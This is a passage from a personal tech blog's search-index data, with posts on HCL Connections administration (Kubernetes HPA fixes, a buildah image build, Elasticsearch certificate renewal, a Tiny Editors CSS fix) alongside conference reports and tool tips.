pictures of me during the talk!), it got better, and I started showing my workflow with dot files and package installation.\nDotfiles verwalten My second session about alternatives to table calculation software started with a thread on Mastodon . There I asked for links and stories about how people use Excel or Google sheets for way more than it was intended to be used.\nI got that many responses and links, I couldn\u0026rsquo;t add all of these, but it is a great read. Thanks for all comments in Mastodon and mail.\nWas man besser nicht mit einer Tabellenkalkulation macht During the talk, Sujeevan made this photo. The talk was in HS1/2, the biggest room of the conference. Having a session there is always a bit special.\nPhotographer: Sujeevan Vijayakumaran There were many more talks and I met with other speakers and attendees during the two days. The overall mood was great and we had insightful discussions.\nI can recommend attending FrOSCon to anybody who is interested in Free and Open-Source software! Maybe we see each other there next year.\n","excerpt":"\u003cp\u003eLast week I attended FrOSCon[https://froscon.org], a yearly conference about Free and Open-Source software, organized by the computer science department of the University of Applied Sciences Bonn-Rhein-Sieg.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/froscon2023/","title":"Froscon 2023"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/froscon/","title":"Froscon,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/oss/","title":"Oss"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/oss/","title":"Oss"},{"body":"After updating HCL Connections to 8CR3 and Tiny Editors to 4.9.2.24 the lines of tables are no longer visible during editing.\nHere is the edit form with Tiny Editors 4.8.2.0:\nEdit form with Tiny Editors 4.8.2.0 and table with border=0 When you try the same in Tiny Editors 4.9.2.24 the editor shows just white space, and you have to have a good imagination of the table cells to click into the right one.\nEdit form with Tiny Editors 4.9.2.24 and table with border=0 The CSS classes are still there, so why does the editor hide the borders in edit mode too?\nTable tag in Tiny Editors 4.8.2.0:\n\u0026lt;table dir=\u0026#34;ltr\u0026#34; style=\u0026#34;border-collapse: collapse; width: 100%;\u0026#34; data-mce-style=\u0026#34;border-collapse: collapse; width: 100%;\u0026#34; class=\u0026#34;mce-item-table\u0026#34; border=\u0026#34;0\u0026#34;\u0026gt; Table tag in Tiny Editors 4.9.2.24:\n\u0026lt;table style=\u0026#34;border-collapse: collapse; width: 100%; border-width: 0px;\u0026#34; border=\u0026#34;1\u0026#34;\u0026gt; So the difference is that the new version keeps border=\u0026quot;1\u0026quot; and removes the border with style=...;border-width: 0px;\nThe CSS class that should show the dashed lines is defined as:\n.mce-item-table:not([border]), .mce-item-table:not([border]) caption, .mce-item-table:not([border]) td, .mce-item-table:not([border]) th, .mce-item-table[border=\u0026#34;0\u0026#34;], .mce-item-table[border=\u0026#34;0\u0026#34;] caption, .mce-item-table[border=\u0026#34;0\u0026#34;] td, .mce-item-table[border=\u0026#34;0\u0026#34;] th, table[style*=\u0026#34;border-width: 0px\u0026#34;], table[style*=\u0026#34;border-width: 0px\u0026#34;] caption, table[style*=\u0026#34;border-width: 0px\u0026#34;] td, table[style*=\u0026#34;border-width: 0px\u0026#34;] th { border:1px dashed #bbb; } The CSS rule gets overwritten by the element and needs to be changed.\nEdit form with Tiny Editors 4.9.2.24 and table with border=0 The easiest workaround is to go to your customization folder, edit \u0026lt;shared directory\u0026gt;/customization/javascript/tiny/editors/connections/tiny-editors.css and add this to the end:\n.mce-item-table:not([border]), .mce-item-table:not([border]) caption, .mce-item-table:not([border]) td, .mce-item-table:not([border]) th, .mce-item-table[border=\u0026#34;0\u0026#34;], .mce-item-table[border=\u0026#34;0\u0026#34;] caption, .mce-item-table[border=\u0026#34;0\u0026#34;] td, .mce-item-table[border=\u0026#34;0\u0026#34;] th, table[style*=\u0026#34;border-width: 0px\u0026#34;], table[style*=\u0026#34;border-width: 0px\u0026#34;] caption, table[style*=\u0026#34;border-width: 0px\u0026#34;] td, table[style*=\u0026#34;border-width: 0px\u0026#34;] th { border:1px dashed #bbb !important; } Restart the Common App, and the dashed lines are back in the editor window. ","excerpt":"\u003cp\u003eAfter updating HCL Connections to 8CR3 and Tiny Editors to 4.9.2.24 the lines of tables are no longer visible during editing.\u003c/p\u003e\n\u003cp\u003eHere is the edit form with Tiny Editors 4.8.2.0:\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/tiny-editors-table/","title":"Show table borders during editing in Tiny Editors"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tiny/","title":"Tiny,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tinyeditors/","title":"Tinyeditors"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tinyeditors/","title":"Tinyeditors"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tinymce/","title":"Tinymce,"},{"body":"During a troubleshooting session in Component Pack, I checked the Kubernetes events.\nkubectl get events -n connections 18m Warning FailedGetScale horizontalpodautoscaler/middleware-jsonapi no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; 18m Warning FailedGetScale horizontalpodautoscaler/mwautoscaler no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; 18m Warning FailedGetScale horizontalpodautoscaler/te-creation-wizard no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; 18m Warning FailedGetScale horizontalpodautoscaler/teams-share-service no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; 18m Warning FailedGetScale horizontalpodautoscaler/teams-share-ui no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; 18m Warning FailedGetScale horizontalpodautoscaler/teams-tab-api no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; 18m Warning FailedGetScale horizontalpodautoscaler/teams-tab-ui no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; Or in k9s: So, there are several thousand messages of a failed autoscaler. The documentation does not mention HPA anywhere. So, I checked the Kubernetes documentation: HorizontalPodAutoscaler Walkthrough One prerequisite to using HPA (HorizontalAutoscaler), is the installation of Metrics Server on the Kubernetes cluster.\nInstall Metrics Server https://github.com/kubernetes-sigs/metrics-server#deployment Install with kubectl kubectl apply -f https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/high-availability-1.21+.yaml Install with helm helm repo add metrics-server https://kubernetes-sigs.github.io/metrics-server/ helm upgrade --install metrics-server metrics-server/metrics-server Allow self-signed certificates With my kubeadm deployed Kubernetes servers, I get errors in the metrics-server pods after the helm deployment.\nscraper.go:149] \u0026#34;Failed to scrape node\u0026#34; err=\u0026#34;Get \\\u0026#34;https://10.0.22.95:10250/metrics/resource\\\u0026#34;: tls: failed to verify certificate: x509: cannot validate certificate for 10.0.22.95 because it doesn\u0026#39;t contain any IP SANs\u0026#34; node=\u0026#34;cnx8-db2-cp.stoeps.home\u0026#34; │ So, the certificate does not contain the IP address. A quick fix is described here . Lets add the parameter --kubelet-insecure-tls to the deployment definition of metrics-server:\nkubectl patch deploy metrics-server -n kube-system --type=json \\ -p=\u0026#39;[{\u0026#34;op\u0026#34;: \u0026#34;add\u0026#34;, \u0026#34;path\u0026#34;: \u0026#34;/spec/template/spec/containers/0/args/-\u0026#34;, \u0026#34;value\u0026#34;: \u0026#34;--kubelet-insecure-tls\u0026#34;}]\u0026#39; Now the metrics-server is starting up and works as expected. In k9s we see now the used cpu and memory:\nFix apiVersion Even after the Metrics server is installed, the events still show errors. Therefore, let's check:\nkubectl describe hpa teams-tab-ui -n connections ... Events: Type Reason Age From Message ---- ------ ---- ---- ------- Warning FailedGetScale 27m (x22287 over 3d21h) horizontal-pod-autoscaler no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; Searching the error message and found: Horizontal Pod Autoscaling failing after upgrading to Google Kubernetes Engine 1.16 with error: no matches for kind \u0026quot;Deployment\u0026quot; in group \u0026quot;extensions\u0026quot; Since Kubernetes 1.16 the HPA configuration needs to be changed from:\n... scaleTargetRef: apiVersion: extensions/v1beta kind: Deployment name: admin-portal ... to\n... scaleTargetRef: apiVersion: apps/v1 kind: Deployment name: admin-portal ... Fix customizer HPA Now most of the HPA are start working, except of the mwautoscaler. Here, the deployment name in scaleTargetRef is wrong and needs to be changed from mwautoscaler to mw-proxy. To adjust the minimum pod count, which is set to 1 in all other HPA, I changed the default 3 to 1 here.\napiVersion: autoscaling/v2 kind: HorizontalPodAutoscaler metadata: annotations: meta.helm.sh/release-name: mw-proxy meta.helm.sh/release-namespace: connections creationTimestamp: \u0026#34;2023-02-08T15:51:28Z\u0026#34; labels: app.kubernetes.io/managed-by: Helm chart: mw-proxy-0.1.0-20230329-171529 environment: \u0026#34;\u0026#34; heritage: Helm name: fsautoscaler release: mw-proxy type: autoscaler name: mwautoscaler namespace: connections resourceVersion: \u0026#34;2105787\u0026#34; uid: 1bf749b4-f4cd-4760-a2e0-357ff0e6772a spec: maxReplicas: 3 metrics: - resource: name: cpu target: averageUtilization: 80 type: Utilization type: Resource minReplicas: 1 scaleTargetRef: apiVersion: apps/v1 kind: Deployment name: mw-proxy status: conditions: - lastTransitionTime: \u0026#34;2023-05-30T10:41:57Z\u0026#34; message: recommended size matches current size reason: ReadyForNewScale status: \u0026#34;True\u0026#34; type: AbleToScale - lastTransitionTime: \u0026#34;2023-05-30T10:41:57Z\u0026#34; message: the HPA was able to successfully calculate a replica count from cpu resource utilization (percentage of request) reason: ValidMetricFound status: \u0026#34;True\u0026#34; type: ScalingActive - lastTransitionTime: \u0026#34;2023-05-30T10:41:57Z\u0026#34; message: the desired count is within the acceptable range reason: DesiredWithinRange status: \u0026#34;False\u0026#34; type: ScalingLimited currentMetrics: - resource: current: averageUtilization: 10 averageValue: 5m name: cpu type: Resource currentReplicas: 1 desiredReplicas: 1 Use kubectl patch to automate the changes # Change apiVersion kubectl patch hpa admin-portal -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa community-template-service -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa middleware-jsonapi -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa te-creation-wizard -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa teams-share-service -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa teams-share-ui -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa teams-tab-api -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa teams-tab-ui -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; # Change customizer kubectl patch hpa mwautoscaler -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;minReplicas\u0026#34;: 1, \u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;,\u0026#34;name\u0026#34;:\u0026#34;mw-proxy\u0026#34;}}}\u0026#39; Working HPA With these changes HPA starts working:\nInteresting to see that the new introduced pod middleware-jsonapi has an HPA configuration, but uses the same old apiVersion as the other ones.\n","excerpt":"\u003cp\u003eDuring a troubleshooting session in Component Pack, I checked the\nKubernetes events.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/hpa/","title":"HorizontalPodAutoscalers (HPA) with HCL Connections Component Pack"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/k8s/","title":"K8s"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/kubernetes/","title":"Kubernetes"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/kubernetes/","title":"Kubernetes"},{"body":"To install the Component Pack for HCL Connections 8, you need to create a Mongodb5 image. The image sources can be found in the HCL MongoDB repository , and the process for creating the image is documented in Installing MongoDB5 for Component Pack 8 . The process involves using Docker, so if you have it installed, you can follow the instructions provided.\nNote that after Kubernetes 1.20, the container engine has been changed to containerd , and Redhat-based systems now prefer podman over Docker. If you want to build container images for podman or Kubernetes/containerd, you can use buildah , which can be installed directly from the official repositories. Installing Docker just for the image creation installs the Docker service and needs resources. Most of the time, buildah is my way to go here.\nPodman can be aliased to docker and you can use all the commands you already know with. One of the differences is that podman doesn\u0026rsquo;t use a service and there is no need to run it as root.\nInstall buildah sudo dnf install buildah Clone Repository git clone https://github.com/HCL-TECH-SOFTWARE/connections-mongo5 Create image cd connections-mongo5 buildah bud -t hclcr.io/cnx/middleware-mongodb5:20230329-171549 . Export image as tar file buildah push --format oci hclcr.io/cnx/middleware-mongodb5:20230329-171549 oci-archive:middleware-mongodb5_20230329-171549.tar Now we can copy the image file to the Kubernetes nodes and import with ctr, or push to a registry.\nctr -n=k8s.io image import --digests=true middleware-mongodb5_20230329-171549.tar Check the imported image:\nctr -n=k8s.io image ls | grep mongodb5 When the image has no tag after importing it, you can tag with ctr:\nctr -n=k8s.io image tag import-2023-05-08@sha256:7d2f5e93a6cebcd29b10b79d5d84f1c41383aaf52db3c14ccd9eff3af7d125d9 \\ hclcr.io/cnx/middleware-mongodb5:20230329-171549 The process is a bit complicated, and when you install with connections-automation you have to run the installation at least twice and the image needs to be imported on each worker node. So, my next task will be a new role to create the image during the installation.\n","excerpt":"\u003cp\u003eTo install the Component Pack for HCL Connections 8, you need to create a Mongodb5 image. The image sources can be found in the \u003ca href=\"https://github.com/HCL-TECH-SOFTWARE/connections-mongo5\" target=\"_blank\"\u003eHCL MongoDB repository \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, and the process for creating the image is documented in \u003ca href=\"https://opensource.hcltechsw.com/connections-doc/v8-cr1/admin/install/installing_mongodb_5_for_component_pack_8.html?h=mongodb5\" target=\"_blank\"\u003eInstalling MongoDB5 for Component Pack 8 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. The process involves using Docker, so if you have it installed, you can follow the instructions provided.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/buildah-for-cp/","title":"Build mongodb5 image for Component Pack with Buildah"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/buildah/","title":"Buildah"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/containerd/","title":"Containerd"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/k8s/","title":"K8s,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/k9s/","title":"K9s"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/podman/","title":"Podman"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tiu/","title":"Tiu,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tool/","title":"Tool,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/engage/","title":"Engage"},{"body":"This year, Engage took place at the Felix Meritis in Amsterdam . The Engage board (Hilde, Theo and Kris) did a great job and made this very special conference a great success.\nFor Connections enthusiasts the most important session was What to expect from the HCL DX and HCL Connections roadmap . I most liked this slide:\nCopyright © 2023CL Software Limited | Confidential and the next features in Connections Juniper:\nCopyright © 2023CL Software Limited | Confidential I had the opportunity to do a new version of the Connections Admintoolbox session.\nHCL Connections Admin Toolbox 2023 Best viewed in fullscreen (use F11 in any browser) Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/engage2023-admintoolbox.html) The closing session was even more emotional than the years before and the biggest announcement:\nEngage 2024 will be in Antwerp.\n","excerpt":"\u003cp\u003eThis year, \u003ca href=\"https://engage.ug\" target=\"_blank\"\u003eEngage \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n took place at the \u003ca href=\"https://felixmeritis.nl/\" target=\"_blank\"\u003eFelix Meritis \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in \u003ca href=\"https://www.iamsterdam.com/\" target=\"_blank\"\u003eAmsterdam \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nThe \u003ca href=\"https://engage.ug/Engage2.nsf/Pages/about\" target=\"_blank\"\u003eEngage board (Hilde, Theo and Kris) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n did a great job and made this very special conference a great success.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/engage2023/","title":"Engage 2023"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/engageug/","title":"Engageug"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/engageug/","title":"Engageug"},{"body":"You can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\nEngage \u0026ndash; https://engage.ug HCL Connections Admin Toolbox Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/engage2023-admintoolbox.html) DACHNUG 50 - https://dnug.de Fehleranalyse bei HCL Connections FroSCon 2023 - https://froscon.org Dotfiles verwalten Was man besser nicht mit einer Tabellenkalkulation macht ","excerpt":"\u003cp\u003eYou can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\u003c/p\u003e\n\u003ch2 id=\"engage-\"\u003eEngage \u0026ndash; \u003ca href=\"https://engage.ug\" target=\"_blank\"\u003ehttps://engage.ug \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#engage-\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/engage2023-admintoolbox.html\" target=\"_blank\"\u003eHCL Connections Admin Toolbox \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ciframe width=\"1024\" height=\"576\" marginheight=\"0\" marginwidth=\"0\" src=\"https://share.stoeps.de/engage2023-admintoolbox.html\"\u003e\n Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/engage2023-admintoolbox.html)\n\u003c/iframe\u003e\n\u003ch2 id=\"dachnug-50--\"\u003eDACHNUG 50 - \u003ca href=\"https://dnug.de\" target=\"_blank\"\u003ehttps://dnug.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#dachnug-50--\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2023-DACHNUG50_Troubleshooting_HCL_Connections.pdf\" target=\"_blank\"\u003eFehleranalyse bei HCL Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"froscon-2023--\"\u003eFroSCon 2023 - \u003ca href=\"https://froscon.org\" target=\"_blank\"\u003ehttps://froscon.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#froscon-2023--\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003eDotfiles verwalten\u003c/li\u003e\n\u003c/ul\u003e\n\u003ciframe width=\"1024\" height=\"576\" src=\"https://media.ccc.de/v/froscon2023-2907-dotfiles_verwalten/oembed\" frameborder=\"0\" allowfullscreen\u003e\u003c/iframe\u003e\n\u003cul\u003e\n\u003cli\u003eWas man besser nicht mit einer Tabellenkalkulation macht\u003c/li\u003e\n\u003c/ul\u003e\n\u003ciframe width=\"1024\" height=\"576\" src=\"https://media.ccc.de/v/froscon2023-2949-was_man_besser_nicht_mit_einer_tabellenkalkulation_macht/oembed\" frameborder=\"0\" allowfullscreen\u003e\u003c/iframe\u003e","ref":"https://stoeps.de/speaking/2023/","title":"Talks 2023"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/display/","title":"Display"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/resolution/","title":"Resolution"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tiu/","title":"Tiu"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tools/","title":"Tools"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/windows/","title":"Windows"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/windows/","title":"Windows"},{"body":"I spend the entire day working on a very sizable 4k UHD display, and I frequently ran into the problem of wanting to share my screen with participants in various collaboration tools. Then, viewers claim that my screen is too small on the remote displays due to the display resolution of 3840x2160 pixels.\nIn order to adjust the resolution, I often go to the desktop and right-click. It is quite frustrating to have to do that several times each day (and switch back after the meeting).\nI created some scripts for Linux that may automatically execute when I start with or without an external display and modify the display resolution. Unfortunately, I also need to utilize other operating systems. What choices are available on Windows?\nI discovered three PowerShell scripts and EXE files, however two of them required licenses for non-personal usage and one of them was broken. I landed up at http://tools.taubenkorb.at/change-screen-resolution/#download , which is available for free download the author just asks for a donation.\nI made two cmd files and transferred the script to my desktop:\n4k.cmd\nChangeScreenResolution.exe /w=3840 /h=2160 /d=0 full_hd.cmd\nChangeScreenResolution.exe /w=1920 /h=1080 /d=0 Now, all I have to do to change the display resolution is double-click the script.\nIt only takes some seconds each time, but the experience is fantastic.\n","excerpt":"\u003cp\u003eI spend the entire day working on a very sizable 4k UHD display, and I\nfrequently ran into the problem of wanting to share my screen with\nparticipants in various collaboration tools.\nThen, viewers claim that my screen is too small on the remote displays due\nto the display resolution of 3840x2160 pixels.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/windows-change-display-resolution-script/","title":"Windows change display resolution with one click"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/chat/","title":"Chat"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/chat/","title":"Chat"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/matrix/","title":"Matrix"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/matrix/","title":"Matrix"},{"body":"The last months I played around with Matrix , a secure and open collaboration system. The protocol looks very promising, it allows hosting your own server and federate it to other systems. So like SMTP, all these matrix users can communicate to each other.\nThis is Matrix. Matrix is an open source project that publishes the Matrix open standard for secure, decentralised, real-time communication, and its Apache licensed reference implementations.\nMaintained by the non-profit Matrix.org Foundation, we aim to create an open platform which is as independent, vibrant and evolving as the Web itself\u0026hellip; but for communication.\nAs of June 2019, Matrix is out of beta, and the protocol is fully suitable for production usage. https://matrix.org/ Matrix Homepage I registered a user at matrix.org , and you can reach me at @stoeps:matrix.org.\nWhy did I start using Matrix?\nMy first group which I joined and reason for registering a Matrix account was the Tilpod matrix chat Fosdem 2022 hosted the online conference with Matrix and Jitsi and handled up to 23000 users All messages are encrypted, the clients and protocol is Open Source Bridges are available to integrate other collaboration protocols like Discord, Whatsapp, Skype and Slack (any many more) Clients for most OS are available to use Matrix for Android, iOS, Web browser, Desktop and so on. So I hope that whenever I want to change to another collaboration system, I don\u0026rsquo;t loose messages again.\nLike the Tilpod group, I created a new group to discuss things around HCL Connections, the group is public, and you\u0026rsquo;re open to join at any time.\nRoom link connections-on-premises When you follow the link, it provides you with all steps to join with your own Matrix instance, or with the web client.\nExample for joining a group If anybody wants to test the bridge to Discord, I\u0026rsquo;m happy to help set up something like https://t2bot.io/discord/ .\n","excerpt":"\u003cp\u003eThe last months I played around with \u003ca href=\"https://matrix.org\" target=\"_blank\"\u003eMatrix \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, a secure and open collaboration system. The protocol looks very promising, it allows hosting your own server and federate it to other systems. So like SMTP, all these matrix users can communicate to each other.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/matrix_channel/","title":"Matrix Channel"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/certificate/","title":"Certificate"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/componentpack/","title":"Componentpack"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/connections/","title":"Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/documentation/","title":"Documentation"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/elasticsearch/","title":"Elasticsearch"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/elasticsearch/","title":"Elasticsearch"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/security/","title":"Security"},{"body":"Elasticsearch in HCL Connections Componentpack is secured with Searchguard and needs certificates to work properly. These certificates are generated by bootstrap during the initial container deployment with helm.\nThese certificates are valid for 10 years (chain_ca.pem) or 2 years (elasticsearch*.pem) and stored in the Kubernetes secrets elasticsearch-secret, elasticsearch-7-secret. So when your HCL Connections deployment is running for 2 years, the certficates stop working.\nThe documentation on bootstrap is a little bit misleading and my suggested update does not make it into a technote or documentation update since nearly one year.\nSet up bootstrap charts Bootstrap is one-time job. It creates secrets and certificates for various components, including Redis, MongoDB and ElasticSearch.\nBe aware that simply rerunning/upgrading bootstrap also means recreating all those secrets and certificates, and requires in some cases redoing the steps which were dependent on it (like setting up certificates again for Metrics).\nStarting with Component Pack 7, bootstrap will also create secrets and certificates for ElasticSearch 7.\nhttps://help.hcltechsw.com/connections/v7/admin/install/cp_install_services_tasks.html?hl=bootstrap#cp_install_services_tasks__section_iqb_24c_qmb HCL Connections documentation For Elasticsearch this is wrong. Bootstrap does only generate new certificates, if the variable env.force_regenerate is set to true. The default is false, so we have to set it during the helm command.\nUpdate Elasticsearch certificates (Example commands for Elasticsearch 7) If you are still using Elasticsearch 5, then just remove -7 from the commands below.\nGet certificate from Kubernetes secret kubectl get secret elasticsearch-7-secret -n connections \\ -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-admin\\.crt\\.pem\u0026#39;]}\u0026#34; | base64 -d \u0026gt; elasticsearch-admin.crt.pem Check dates for certificate openssl x509 -startdate -enddate -noout -in elasticsearch-admin.crt.pem notBefore=Aug 16 08:10:54 2022 GMT notAfter=Aug 15 08:10:54 2024 GMT Delete bootstrap helm delete bootstrap -n connections Reinstall with helm If we use the command from documentation, the certificate extracted from Kubernetes has still the same enddate.\nhelm install bootstrap \\ /opt/hcl-cnx-component-pack/microservices_connections/hybridcloud/helmbuilds/bootstrap-0.1.0-20210418-223218.tgz \\ -f /home/ansible/generated_charts/bootstrap.yml -n connections We need to run\nhelm install bootstrap \\ /opt/hcl-cnx-component-pack/microservices_connections/hybridcloud/helmbuilds/bootstrap-0.1.0-20210418-223218.tgz \\ -f /home/ansible/generated_charts/bootstrap.yml -n connections --set env.force_regenerate=true Check if the bootstrap pod is completed, then check the certificate again:\nkubectl get pods -n connections | grep bootstrap bootstrap-p4rj6 0/1 Completed 0 49m kubectl get secret elasticsearch-7-secret -n connections \\ -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-admin\\.crt\\.pem\u0026#39;]}\u0026#34; | base64 -d \u0026gt; elasticsearch-admin_neu.crt.pem openssl x509 -startdate -enddate -noout -in elasticsearch-admin_neu.crt.pem notBefore=Sep 2 10:01:56 2022 GMT notAfter=Sep 1 10:01:56 2024 GMT Restart Elasticsearch kubectl rollout restart sts es-master-7 es-data-7 -n connections kubectl rollout restart deploy es-client-7 -n connections Recreate elasticsearch-metrics.p12 kubectl get secret elasticsearch-7-secret -n connections \\ -o=jsonpath=\u0026#34;{.data[\u0026#39;chain-ca\\.pem\u0026#39;]}\u0026#34; | base64 -d \u0026gt; chain-ca.pem kubectl get secret elasticsearch-7-secret -n connections \\ -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-metrics\\.p12\u0026#39;]}\u0026#34; | base64 -d \u0026gt; elasticsearch-metrics.p12 Copy these certificates to the WebSphere Deployment Manager, check the path of the old certificate store and use the same. cd /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -user wasadmin_user -password wasadmin_password execfile(\u0026#39;esSecurityAdmin.py\u0026#39;) enableSslForMetrics(\u0026#39;/opt/IBM/certs/es_certs/elasticsearch-metrics.p12\u0026#39;, \u0026#39;Elasticsearch_CA_password\u0026#39;, \u0026#39;/opt/IBM/certs/es_certs/chain-ca.pem\u0026#39;, 